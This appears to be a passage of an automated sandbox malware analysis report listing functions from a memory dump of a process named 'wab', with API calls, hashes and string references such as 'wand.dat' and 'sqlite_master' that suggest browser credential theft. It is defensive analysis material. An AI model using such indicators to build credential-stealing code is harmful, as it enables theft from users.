                                                                                              • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                              • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                              • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                              • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 3384217055-0
                                                                                              • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                              • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                              • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                              • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$memcpy
                                                                                              • String ID:
                                                                                              • API String ID: 368790112-0
• Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
• Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
• Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
• Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
  • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
  • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
• GetMenu.USER32(?), ref: 00410F8D
• GetSubMenu.USER32(00000000), ref: 00410F9A
• GetSubMenu.USER32(00000000), ref: 00410F9D
• CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: Menu$ItemMessageSend$CheckEnableRadio
• String ID:
• API String ID: 1889144086-0
• Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
• Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
• Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
• Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
• MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
• GetLastError.KERNEL32 ref: 0041810A
• CloseHandle.KERNEL32(00000000), ref: 00418120
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: File$CloseCreateErrorHandleLastMappingView
• String ID:
• API String ID: 1661045500-0
• Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
• Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
• Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
• Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
• memcpy.MSVCRT ref: 0042EC7A
Strings
• Cannot add a column to a view, xrefs: 0042EBE8
• sqlite_altertab_%s, xrefs: 0042EC4C
• virtual tables may not be altered, xrefs: 0042EBD2
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: memcpymemset
• String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
• API String ID: 1297977491-2063813899
• Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
• Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
• Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
• Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040560C
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
• String ID: *.*$dat$wand.dat
• API String ID: 2618321458-1828844352
• Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
• Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
• Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
• Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
• wcslen.MSVCRT ref: 00410C74
• _wtoi.MSVCRT ref: 00410C80
• _wcsicmp.MSVCRT ref: 00410CCE
• _wcsicmp.MSVCRT ref: 00410CDF
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: _wcsicmp$??2@??3@_wtoiwcslen
• String ID:
• API String ID: 1549203181-0
• Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
• Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
• Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
• Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00412057
  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
• SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
• GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
• GetKeyState.USER32(00000010), ref: 0041210D
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: ExecuteMenuMessageSendShellStateStringmemset
• String ID:
• API String ID: 3550944819-0
• Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
• Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
• Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
• Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
Uniqueness
Uniqueness Score: -1.00%

APIs
• wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
• ??3@YAXPAX@Z.MSVCRT ref: 0040A908
• ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
• memcpy.MSVCRT ref: 0040A94F
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: ??3@$memcpy$mallocwcslen
• String ID:
• API String ID: 3023356884-0
• Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
• Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
• Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
• Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
Uniqueness
Uniqueness Score: -1.00%

APIs
• wcslen.MSVCRT ref: 0040B1DE
• ??3@YAXPAX@Z.MSVCRT ref: 0040B201
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
• ??3@YAXPAX@Z.MSVCRT ref: 0040B224
• memcpy.MSVCRT ref: 0040B248
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: ??3@$memcpy$mallocwcslen
• String ID:
• API String ID: 3023356884-0
• Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
• Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
• Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
• Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: memcpy
• String ID: @
• API String ID: 3510742995-2766056989
• Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
• Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
• Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
• Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: ??2@??3@memcpymemset
• String ID:
• API String ID: 1865533344-0
• Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
• Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
• Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
• Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
Uniqueness
Uniqueness Score: -1.00%

APIs
• strlen.MSVCRT ref: 0040B0D8
• ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
• ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
• memcpy.MSVCRT ref: 0040B159
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: ??3@$memcpy$mallocstrlen
• String ID:
• API String ID: 1171893557-0
• Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
• Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
• Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
• Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 004144E7
  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
  • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
• WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
• memset.MSVCRT ref: 0041451A
• GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 1127616056-0
                                                                                              • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                              • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                              • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                              • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memset
                                                                                              • String ID: sqlite_master
                                                                                              • API String ID: 438689982-3163232059
                                                                                              • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                              • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                              • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                              • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                              • wcscpy.MSVCRT ref: 00414DF3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 3917621476-0
                                                                                              • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                              • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                              • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                              • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                              • _snwprintf.MSVCRT ref: 00410FE1
                                                                                              • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                              • _snwprintf.MSVCRT ref: 0041100C
                                                                                              • wcscat.MSVCRT ref: 0041101F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                              • String ID:
                                                                                              • API String ID: 822687973-0
                                                                                              • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                              • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                              • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                              • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                              • malloc.MSVCRT ref: 00417459
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$??3@malloc
                                                                                              • String ID:
                                                                                              • API String ID: 4284152360-0
                                                                                              • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                              • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                              • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                              • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                              • RegisterClassW.USER32(?), ref: 00412428
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                              • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2678498856-0
                                                                                              • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                              • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                              • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                              • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                              • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                              • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                              • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Item
                                                                                              • String ID:
                                                                                              • API String ID: 3888421826-0
                                                                                              • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                              • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                              • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                              • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00417B7B
                                                                                              • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                              • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                              • GetLastError.KERNEL32 ref: 00417BB5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$ErrorLastLockUnlockmemset
                                                                                              • String ID:
                                                                                              • API String ID: 3727323765-0
                                                                                              • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                              • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                              • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                              • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                              • malloc.MSVCRT ref: 00417407
                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$??3@malloc
                                                                                              • String ID:
                                                                                              • API String ID: 4284152360-0
                                                                                              • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                              • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                              • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                              • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040F673
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                              • strlen.MSVCRT ref: 0040F6A2
                                                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 2754987064-0
                                                                                              • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                              • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                              • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                              • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

